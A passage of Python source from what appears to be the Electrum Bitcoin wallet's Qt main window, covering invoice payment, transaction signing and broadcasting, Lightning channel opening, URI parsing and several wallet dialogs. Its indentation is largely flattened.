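    # amount truncated to satoshis (see FIXME below), and the payment coroutine is
    # submitted to the network's asyncio loop from the wallet's background thread.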
def pay_lightning_invoice(self, invoice: str, *, amount_msat: Optional[int]):
if amount_msat is None:
raise Exception("missing amount for LN invoice")
amount_sat = Decimal(amount_msat) / 1000
# FIXME this is currently lying to user as we truncate to satoshis
msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.format_amount_and_units(amount_sat))
if not self.question(msg):
return
self.save_pending_invoice()
def task():
coro = self.wallet.lnworker.pay_invoice(invoice, amount_msat=amount_msat, attempts=LN_NUM_PAYMENT_ATTEMPTS)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
return fut.result()
self.wallet.thread.add(task)
def on_request_status(self, wallet, key, status):
if wallet != self.wallet:
return
req = self.wallet.receive_requests.get(key)
if req is None:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
self.need_update.set()
else:
self.request_list.update_item(key, req)
def on_invoice_status(self, wallet, key):
if wallet != self.wallet:
return
invoice = self.wallet.get_invoice(key)
if invoice is None:
return
status = self.wallet.get_invoice_status(invoice)
if status == PR_PAID:
self.invoice_list.update()
else:
self.invoice_list.update_item(key, invoice)
def on_payment_succeeded(self, wallet, key):
description = self.wallet.get_label(key)
self.notify(_('Payment succeeded') + '\n\n' + description)
self.need_update.set()
def on_payment_failed(self, wallet, key, reason):
self.show_error(_('Payment failed') + '\n\n' + reason)
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
try:
if not self._is_onchain:
invoice_str = self.payto_e.lightning_invoice
if not invoice_str:
return
if not self.wallet.has_lightning():
self.show_error(_('Lightning is disabled'))
return
invoice = LNInvoice.from_bech32(invoice_str)
if invoice.get_amount_msat() is None:
amount_sat = self.amount_e.get_amount()
if amount_sat:
invoice.amount_msat = int(amount_sat * 1000)
else:
self.show_error(_('No amount'))
return
return invoice
else:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.payto_URI)
except InvoiceError as e:
self.show_error(_('Error creating payment') + ':\n' + str(e))
def do_save_invoice(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.save_pending_invoice()
def save_pending_invoice(self):
if not self.pending_invoice:
return
self.do_clear()
self.wallet.save_invoice(self.pending_invoice)
self.invoice_list.update()
self.pending_invoice = None
def do_pay(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.do_pay_invoice(self.pending_invoice)
def pay_multiple_invoices(self, invoices):
outputs = []
for invoice in invoices:
outputs += invoice.outputs
self.pay_onchain_dialog(self.get_coins(), outputs)
def do_pay_invoice(self, invoice: 'Invoice'):
if invoice.type == PR_TYPE_LN:
assert isinstance(invoice, LNInvoice)
self.pay_lightning_invoice(invoice.invoice, amount_msat=invoice.get_amount_msat())
elif invoice.type == PR_TYPE_ONCHAIN:
assert isinstance(invoice, OnchainInvoice)
self.pay_onchain_dialog(self.get_coins(), invoice.outputs)
else:
raise Exception('unknown invoice type')
def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]:
coins = self.get_manually_selected_coins()
if coins is not None:
return coins
else:
return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only)
def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]:
"""Return a list of selected coins or None.
Note: None means selection is not being used,
        while an empty sequence means the user explicitly selected nothing (spend no coins).
"""
return self.utxo_list.get_spend_list()
def get_text_not_enough_funds_mentioning_frozen(self) -> str:
text = _("Not enough funds")
frozen_str = self.get_frozen_balance_str()
if frozen_str:
text += " ({} {})".format(
frozen_str, _("are frozen")
)
return text
def get_frozen_balance_str(self) -> Optional[str]:
frozen_bal = sum(self.wallet.get_frozen_balance())
if not frozen_bal:
return None
return self.format_amount_and_units(frozen_bal)
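    # On-chain payment flow: ConfirmTxDialog (fee selection) -> optional advanced
    # preview -> sign_tx_with_password -> broadcast_or_show. external_keypairs is
    # used when sweeping keys that are not part of this wallet.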
def pay_onchain_dialog(
self, inputs: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], *,
external_keypairs=None) -> None:
# trustedcoin requires this
if run_hook('abort_send', self):
return
is_sweep = bool(external_keypairs)
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=inputs,
outputs=outputs,
fee=fee_est,
is_sweep=is_sweep)
output_values = [x.value for x in outputs]
if any(parse_max_spend(outval) for outval in output_values):
output_value = '!'
else:
output_value = sum(output_values)
conf_dlg = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep)
if conf_dlg.not_enough_funds:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
if not conf_dlg.have_enough_funds_assuming_zero_fees():
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_message(text)
return
# shortcut to advanced preview (after "enough funds" check!)
if self.config.get('advanced_preview'):
preview_dlg = PreviewTxDialog(
window=self,
make_tx=make_tx,
external_keypairs=external_keypairs,
output_value=output_value)
preview_dlg.show()
return
cancelled, is_send, password, tx = conf_dlg.run()
if cancelled:
return
if is_send:
self.save_pending_invoice()
def sign_done(success):
if success:
self.broadcast_or_show(tx)
self.sign_tx_with_password(tx, callback=sign_done, password=password,
external_keypairs=external_keypairs)
else:
preview_dlg = PreviewTxDialog(
window=self,
make_tx=make_tx,
external_keypairs=external_keypairs,
output_value=output_value)
preview_dlg.show()
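    # Incomplete (not fully signed) transactions, or any transaction while offline,
    # are shown in the transaction dialog instead of being broadcast.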
def broadcast_or_show(self, tx: Transaction):
if not tx.is_complete():
self.show_transaction(tx)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
self.show_transaction(tx)
return
self.broadcast_transaction(tx)
@protected
def sign_tx(self, tx, *, callback, external_keypairs, password):
self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs)
def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if external_keypairs:
# can sign directly
task = partial(tx.sign, external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
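    # Broadcasting runs in a non-GUI thread via WaitingDialog; for BIP70 payment
    # requests it also sends the payment message and waits up to 20 seconds for the
    # merchant's payment ACK.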
def broadcast_transaction(self, tx: Transaction):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Invoice has expired")
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
return False, e.get_message_for_gui()
except BestEffortRequestFailed as e:
return False, repr(e)
# success
txid = tx.txid()
if pr:
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return True, txid
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
success, msg = result
if success:
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def mktx_for_open_channel(self, *, funding_sat, node_id):
coins = self.get_coins(nonlocal_only=True)
make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel(
coins=coins,
funding_sat=funding_sat,
node_id=node_id,
fee_est=fee_est)
return make_tx
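    # Channel-opening flow: the funding tx is built and confirmed via ConfirmTxDialog
    # (preview disabled so it cannot be broadcast before the establishment flow), the
    # final funding amount is read back from the tx ('!' resolved to an int), and
    # lnworker.open_channel() runs in a background WaitingDialog.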
def open_channel(self, connect_str, funding_sat, push_amt):
try:
node_id, rest = extract_nodeid(connect_str)
except ConnStringFormatError as e:
self.show_error(str(e))
return
if self.wallet.lnworker.has_conflicting_backup_with(node_id):
msg = messages.MGS_CONFLICTING_BACKUP_INSTANCE
if not self.question(msg):
return
# use ConfirmTxDialog
# we need to know the fee before we broadcast, because the txid is required
make_tx = self.mktx_for_open_channel(funding_sat=funding_sat, node_id=node_id)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False)
# disable preview button because the user must not broadcast tx before establishment_flow
d.preview_button.setEnabled(False)
cancelled, is_send, password, funding_tx = d.run()
if not is_send:
return
if cancelled:
return
# read funding_sat from tx; converts '!' to int value
funding_sat = funding_tx.output_value_for_address(ln_dummy_address())
def task():
return self.wallet.lnworker.open_channel(
connect_str=connect_str,
funding_tx=funding_tx,
funding_sat=funding_sat,
push_amt_sat=push_amt,
password=password)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(repr(e)))
WaitingDialog(self, _('Opening channel...'), task, self.on_open_channel_success, on_failure)
def on_open_channel_success(self, args):
chan, funding_tx = args
lnworker = self.wallet.lnworker
if not chan.has_onchain_backup():
backup_dir = self.config.get_backup_dir()
if backup_dir is not None:
                self.show_message(_('Your wallet backup has been updated in {}').format(backup_dir))
else:
data = lnworker.export_channel_backup(chan.channel_id)
help_text = _(messages.MSG_CREATED_NON_RECOVERABLE_CHANNEL)
self.show_qrcode(
data, _('Save channel backup'),
help_text=help_text,
show_copy_text_btn=True)
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
if not funding_tx.is_complete():
message += '\n\n' + _('Please sign and broadcast the funding transaction')
self.show_message(message)
self.show_transaction(funding_tx)
else:
self.show_message(message)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b: bool) -> None:
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoices(self, keys):
for key in keys:
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setAmount(pr.get_amount())
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request: 'paymentrequest.PaymentRequest'):
self.set_onchain(True)
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def set_ln_invoice(self, invoice: str):
"""Parse ln invoice, and prepare the send tab for it."""
try:
lnaddr = lndecode(invoice)
except LnInvoiceException as e:
self.show_error(_("Error parsing Lightning invoice") + f":\n{e}")
return
pubkey = bh2u(lnaddr.pubkey.serialize())
for k,v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.payto_e.lightning_invoice = invoice
self.message_e.setText(description)
if lnaddr.get_amount_sat() is not None:
self.amount_e.setAmount(lnaddr.get_amount_sat())
self.set_onchain(False)
def set_onchain(self, b):
self._is_onchain = b
self.max_button.setEnabled(b)
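    # Parses a BIP21 payment URI. An 'r' parameter (payment request URL) or a signed
    # request ('name' + 'sig') triggers the asynchronous BIP70 flow via self.on_pr;
    # otherwise address/amount/label/message are filled into the send tab directly.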
def set_bip21(self, text: str):
try:
out = util.parse_URI(text, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
def pay_to_URI(self, text: str):
if not text:
return
# first interpret as lightning invoice
bolt11_invoice = maybe_extract_bolt11_invoice(text)
if bolt11_invoice:
self.set_ln_invoice(bolt11_invoice)
else:
self.set_bip21(text)
# update fiat amount
self.amount_e.textEdited.emit("")
self.show_send_tab()
def do_clear(self):
self.max_button.setChecked(False)
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e]:
e.setText('')
e.setFrozen(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
utxos_str = {utxo.prevout.to_str() for utxo in utxos}
self.wallet.set_frozen_state_of_coins(utxos_str, freeze)
self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
tab = self.create_list_tab(l, toolbar)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return tab
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = UTXOList(self)
return self.create_list_tab(self.utxo_list)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if not self.question(_("Do you want to remove {} from your wallet?").format(addr)):
return
try:
self.wallet.delete_address(addr)
except UserFacingException as e:
self.show_error(str(e))
else:
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_onchain_invoice(self, invoice: OnchainInvoice):
amount_str = self.format_amount(invoice.amount_sat) + ' ' + self.base_unit()
d = WindowModalDialog(self, _("Onchain Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
grid.addWidget(QLabel(amount_str), 1, 1)
if len(invoice.outputs) == 1:
grid.addWidget(QLabel(_("Address") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.get_address()), 2, 1)
else:
            outputs_str = '\n'.join(map(lambda x: x.address + ' : ' + self.format_amount(x.value) + ' ' + self.base_unit(), invoice.outputs))
grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0)
grid.addWidget(QLabel(outputs_str), 2, 1)
grid.addWidget(QLabel(_("Description") + ':'), 3, 0)
grid.addWidget(QLabel(invoice.message), 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1)
if invoice.bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70))
pr.verify(self.contacts)
grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0)
grid.addWidget(QLabel(pr.get_requestor()), 5, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 6, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 6, 1)
def do_export():
key = pr.get_id()
name = str(key) + '.bip70'
fn = getSaveFileName(
parent=self,
title=_("Save invoice to file"),
filename=name,
filter="*.bip70",
config=self.config,
)
if not fn:
return
with open(fn, 'wb') as f:
                    f.write(pr.raw)
self.show_message(_('BIP70 invoice saved as {}').format(fn))
exportButton = EnterButton(_('Export'), do_export)
buttons = Buttons(exportButton, CloseButton(d))
else:
buttons = Buttons(CloseButton(d))
vbox.addLayout(grid)
vbox.addLayout(buttons)
d.exec_()
def show_lightning_invoice(self, invoice: LNInvoice):
lnaddr = lndecode(invoice.invoice)
d = WindowModalDialog(self, _("Lightning Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0)
grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
amount_str = self.format_amount(invoice.get_amount_sat()) + ' ' + self.base_unit()
grid.addWidget(QLabel(amount_str), 1, 1)
grid.addWidget(QLabel(_("Description") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.message), 2, 1)
grid.addWidget(QLabel(_("Hash") + ':'), 3, 0)
payhash_e = ButtonsLineEdit(lnaddr.paymenthash.hex())
payhash_e.addCopyButton(self.app)
payhash_e.setReadOnly(True)
grid.addWidget(payhash_e, 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1)
vbox.addLayout(grid)
invoice_e = ShowQRTextEdit(config=self.config)
invoice_e.addCopyButton(self.app)
invoice_e.setText(invoice.invoice)
vbox.addWidget(invoice_e)
vbox.addLayout(Buttons(CloseButton(d),))
d.exec_()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.db.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
'lnutil': lnutil,
})
c = commands.Commands(
config=self.config,
daemon=self.gui_object.daemon,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
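        # Wrap each Commands method so console calls automatically get the current
        # wallet and a password prompt injected as arguments.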
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config','daemon']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog)
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog))
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog)
sb.addPermanentWidget(self.seed_button)
self.lightning_button = StatusBarButton(read_QIcon("lightning.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
sb.addPermanentWidget(self.lightning_button)
self.update_lightning_icon()
self.status_button = None
if self.network:
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog)
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def create_coincontrol_statusbar(self):
self.coincontrol_sb = sb = QStatusBar()
sb.setSizeGripEnabled(False)
#sb.setFixedHeight(3 * char_width_in_lineedit())
sb.setStyleSheet('QStatusBar::item {border: None;} '
+ ColorScheme.GREEN.as_stylesheet(True))
self.coincontrol_label = QLabel()
self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
sb.addWidget(self.coincontrol_label)
clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None))
clear_cc_button.setStyleSheet("margin-right: 5px;")
sb.addPermanentWidget(clear_cc_button)
sb.setVisible(False)
return sb
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
if not msg:
self.coincontrol_label.setText("")
self.coincontrol_sb.setVisible(False)
return
self.coincontrol_label.setText(msg)
self.coincontrol_sb.setVisible(True)
def update_lightning_icon(self):
if not self.wallet.has_lightning():
self.lightning_button.setVisible(False)
return
if self.network is None or self.network.channel_db is None:
self.lightning_button.setVisible(False)
return
self.lightning_button.setVisible(True)
cur, total, progress_percent = self.network.lngossip.get_sync_progress_estimate()
# self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}")
progress_str = "??%"
if progress_percent is not None:
progress_str = f"{progress_percent}%"
if progress_percent and progress_percent >= 100:
self.lightning_button.setMaximumWidth(25)
self.lightning_button.setText('')
self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced."))
else:
self.lightning_button.setMaximumWidth(25 + 5 * char_width_in_lineedit())
self.lightning_button.setText(progress_str)
self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n"
"Payments are more likely to succeed with a more complete graph."))
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
def change_password_dialog(self):
from electrum.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def init_lightning_dialog(self, dialog):
assert not self.wallet.has_lightning()
if self.wallet.can_have_deterministic_lightning():
msg = _(
"Lightning is not enabled because this wallet was created with an old version of Electrum. "
"Create lightning keys?")
else:
            msg = _(
                "Warning: this wallet type does not support channel recovery from seed. "
                "You will need to back up your wallet every time you create a new channel. "
                "Create lightning keys?")
if self.question(msg):
self._init_lightning_dialog(dialog=dialog)
@protected
def _init_lightning_dialog(self, *, dialog, password):
dialog.close()
self.wallet.init_lightning(password=password)
self.update_lightning_icon()
self.show_message(_('Lightning keys have been initialized.'))
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(800, 100)
vbox = QVBoxLayout()
wallet_type = self.wallet.db.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('False')
if self.wallet.has_seed():
seed_available = _('True')
ks = self.wallet.keystore
assert isinstance(ks, keystore.Deterministic_KeyStore)
seed_available += f" ({ks.get_seed_type()})"
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(WWLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(WWLabel(basename), 0, 1)
grid.addWidget(WWLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(WWLabel(wallet_type), 1, 1)
grid.addWidget(WWLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(WWLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(WWLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(WWLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(WWLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(WWLabel(ks_type), 4, 1)
# lightning
grid.addWidget(WWLabel(_('Lightning') + ':'), 5, 0)
from .util import IconLabel
if self.wallet.has_lightning():
if self.wallet.lnworker.has_deterministic_node_id():
grid.addWidget(WWLabel(_('Enabled')), 5, 1)
else:
label = IconLabel(text='Enabled, non-recoverable channels')
label.setIcon(read_QIcon('nocloud'))
grid.addWidget(label, 5, 1)
if self.wallet.db.get('seed_type') == 'segwit':
msg = _("Your channels cannot be recovered from seed, because they were created with an old version of Electrum. "
"This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
"If you want this wallet to have recoverable channels, you must close your existing channels and restore this wallet from seed")
else:
msg = _("Your channels cannot be recovered from seed. "
"This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
"If you want to have recoverable channels, you must create a new wallet with an Electrum seed")
grid.addWidget(HelpButton(msg), 5, 3)
grid.addWidget(WWLabel(_('Lightning Node ID:')), 7, 0)
# TODO: ButtonsLineEdit should have a addQrButton method
nodeid_text = self.wallet.lnworker.node_keypair.pubkey.hex()
nodeid_e = ButtonsLineEdit(nodeid_text)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
nodeid_e.addButton(qr_icon, lambda: self.show_qrcode(nodeid_text, _("Node ID")), _("Show QR Code"))
nodeid_e.addCopyButton(self.app)
nodeid_e.setReadOnly(True)
nodeid_e.setFont(QFont(MONOSPACE_FONT))
grid.addWidget(nodeid_e, 8, 0, 1, 4)
else:
if self.wallet.can_have_lightning():
grid.addWidget(WWLabel('Not enabled'), 5, 1)
button = QPushButton(_("Enable"))
button.pressed.connect(lambda: self.init_lightning_dialog(dialog))
grid.addWidget(button, 5, 3)
else:
grid.addWidget(WWLabel(_("Not available for this wallet.")), 5, 1)
grid.addWidget(HelpButton(_("Lightning is currently restricted to HD wallets with p2wpkh addresses.")), 5, 2)
vbox.addLayout(grid)
labels_clayout = None
if self.wallet.is_deterministic():
keystores = self.wallet.get_keystores()
ks_stack = QStackedWidget()
def select_ks(index):
ks_stack.setCurrentIndex(index)
# only show the combobox in case multiple accounts are available
if len(keystores) > 1:
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: select_ks(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Select keystore"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
for ks in keystores:
